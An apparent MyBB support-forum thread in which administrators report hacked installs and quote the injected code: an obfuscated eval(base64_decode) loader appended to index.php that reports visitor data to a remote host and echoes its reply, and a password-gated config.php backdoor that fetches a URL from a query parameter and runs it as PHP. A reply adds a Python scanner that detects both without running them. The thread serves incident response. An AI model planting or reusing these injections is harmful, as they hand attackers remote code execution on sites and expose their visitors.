MyBB Community Forums

iframe injection in index.php files....
So a few users have been complaining that Norton was throwing alerts when they would log in to the forum. One guy actually remembered to save the alert and post it up so I could see what it said, and here's what we have:

"Web Attack: Mass Iframe Injection Attack 2; An intrusion attempt by myforumurl.com was blocked; Mon.,Oct 17, 8:42 AM; (IP address removed)."

Anyhow, while running the file verification tool, I noticed that all of the index.php files within MyBB had the following PHP code added to the very bottom of the file:

<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>

that code was added to the following files:

/index.php
/admin/index.php
/admin/modules/home/index.php
/archive/index.php
Hmm, re-upload fresh files from the latest MyBB download package (see also 1.6.4 Security Vulnerability).
(2011-10-17, 08:39 PM) ranjani Wrote: Hmm, re-upload fresh files from the latest MyBB download package (see also 1.6.4 Security Vulnerability).

Yep, I just did that for every forum I run.

^ Someone also suggested checking config.php for any malicious code - of course, it is generally not writeable; yet...
(2011-10-17, 08:50 PM) ranjani Wrote: ^ Someone also suggested checking config.php for any malicious code - of course, it is generally not writeable; yet...

It's writable by default, and some folks have had it compromised as well.
^ Though off topic, I do not understand the reason for using CHMOD 666 for config.php.
Some use 444!! AND make it writeable only when it is necessary, & put back CHMOD 444!!
Out of the 3 MyBB installations on my server, I did notice this code in 1 of the 3 config.php files:

// Backdoor as found: only responds when ?pingnow= and ?pass= are both present
if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
    // hard-coded MD5 of the attacker's password
    if ($_GET['pass'] == '4be5a36cbaca8ab9d2066debfe4e65c1'){
        // 'exec' mode: downloads the URL given in ?file= into a randomly named .php
        // file in the current directory, then redirects the browser to it
        if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
            $ch = curl_init($_GET['file']);
            $fnm = md5(rand(0,100)).'.php';
            $fp = fopen($fnm, "w");
            curl_setopt($ch, CURLOPT_FILE, $fp);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            curl_exec($ch);
            curl_close($ch);
            fclose($fp);
            echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
        }
        // 'eval' mode: fetches the URL given in ?file= and runs the response as PHP
        if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
            $ch = curl_init($_GET['file']);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            $re = curl_exec($ch);
            curl_close($ch);
            eval($re);
        }
    }
}
Also wanted to note that my showthread.php was infected...
Every file on your site can be infected by this issue; new files can be created, database access, etc. can all be compromised. It's an "open" exploit that lets most any code be executed.
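To help others check their own files, here is an added example (written for this reply, not code from the thread or from MyBB) of a small Python scanner that looks for the two kinds of injection reported above: the obfuscated eval(base64_decode(...)) loader appended to index.php, and the curl_init/eval backdoor found in config.php. It also unwraps the loader statically, with no PHP executed and no network access, by base64-decoding the `$_X` string and replaying the strtr() character swap that the second stage applies. The sample file contents are constructed from the strings quoted in this thread, the signature names are our own labels, and the `scan_tree` helper assumes you point it at a webroot on disk.

```python
import base64
import os
import re
from typing import Dict, List, Optional

# Constructed sample 1: the loader appended to index.php, as quoted in the thread.
# The two base64 strings are the ones from the post; the beacon code after them is trimmed.
INJECTED_INDEX = (
    "<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';"
    "eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7"
    "JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));"
    "$tmp = file_get_contents($url); echo $tmp; ?>"
)

# Constructed sample 2: the remote-fetch backdoor found in config.php, abbreviated from the thread.
INJECTED_CONFIG = """<?php
if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == '4be5a36cbaca8ab9d2066debfe4e65c1'){
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$re = curl_exec($ch);
eval($re);
}}}
"""

# Constructed sample 3: an uninfected config fragment, to show the scanner stays quiet on clean files.
CLEAN_CONFIG = "<?php\n$config['database']['type'] = 'mysqli';\n$config['database']['database'] = 'mybb';\n"

# Signature names are our own labels; the patterns are derived from the two infected samples.
SIGNATURES: Dict[str, "re.Pattern[str]"] = {
    "obfuscated eval loader": re.compile(
        r"\$_F\s*=\s*__FILE__\s*;\s*\$_X\s*=\s*'[A-Za-z0-9+/=]+'\s*;\s*eval\s*\(\s*base64_decode"),
    "eval of base64 payload": re.compile(r"eval\s*\(\s*base64_decode\s*\("),
    "remote fetch then eval": re.compile(r"curl_init\s*\(\s*\$_GET\[.*?eval\s*\(", re.S),
    "remote code written to .php": re.compile(r"md5\s*\(\s*rand\s*\(.*?\.php'", re.S),
}


def scan_php(source: str) -> List[str]:
    """Return the names of every signature that matches this PHP source (empty list = clean)."""
    return [name for name, rx in SIGNATURES.items() if rx.search(source)]


def decode_loader(source: str) -> Optional[str]:
    """Statically unwrap the $_X / eval(base64_decode(...)) loader without executing it.

    Stage 2 (the eval argument) only base64-decodes $_X and passes it through strtr()
    with a fixed character swap, so we read the swap table out of stage 2 and apply
    the same substitution in Python to recover the hidden stage-1 PHP.
    """
    m = re.search(r"\$_X\s*=\s*'([A-Za-z0-9+/=]+)'.*?eval\s*\(\s*base64_decode\s*\(\s*'([A-Za-z0-9+/=]+)'",
                  source, re.S)
    if not m:
        return None
    stage1 = base64.b64decode(m.group(1)).decode("latin-1")
    stage2 = base64.b64decode(m.group(2)).decode("latin-1")
    swap = re.search(r"strtr\(\$_X,'([^']*)','([^']*)'\)", stage2)
    if swap:
        stage1 = stage1.translate(str.maketrans(swap.group(1), swap.group(2)))
    return stage1


def scan_tree(root: str) -> Dict[str, List[str]]:
    """Walk a webroot and map each .php file to the signatures it triggers (clean files are omitted)."""
    hits: Dict[str, List[str]] = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, "r", encoding="latin-1") as fh:
                    found = scan_php(fh.read())
                if found:
                    hits[path] = found
    return hits


if __name__ == "__main__":
    for label, sample in (("index.php", INJECTED_INDEX), ("config.php", INJECTED_CONFIG), ("clean", CLEAN_CONFIG)):
        print(label, "->", scan_php(sample) or "clean")
    # Shows the hidden $url assignment; the host is only printed, never contacted.
    print("loader hides:", decode_loader(INJECTED_INDEX))
```

Run it against a webroot with `scan_tree("/path/to/forum")` and treat every hit as a file to replace from a fresh MyBB package rather than to "clean" in place; the loader stage decodes to a plain `$url = 'http://...'` assignment pointing at the attacker's beacon script, which is why the file_get_contents() call in the appended code works at all.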
You have the EXACT same problem as me! I traced the injection to DrHouseNews.Orge.pl! See the two threads below:

http://community.mybb.com/thread-106302.html
http://community.mybb.com/thread-106212-page-2.html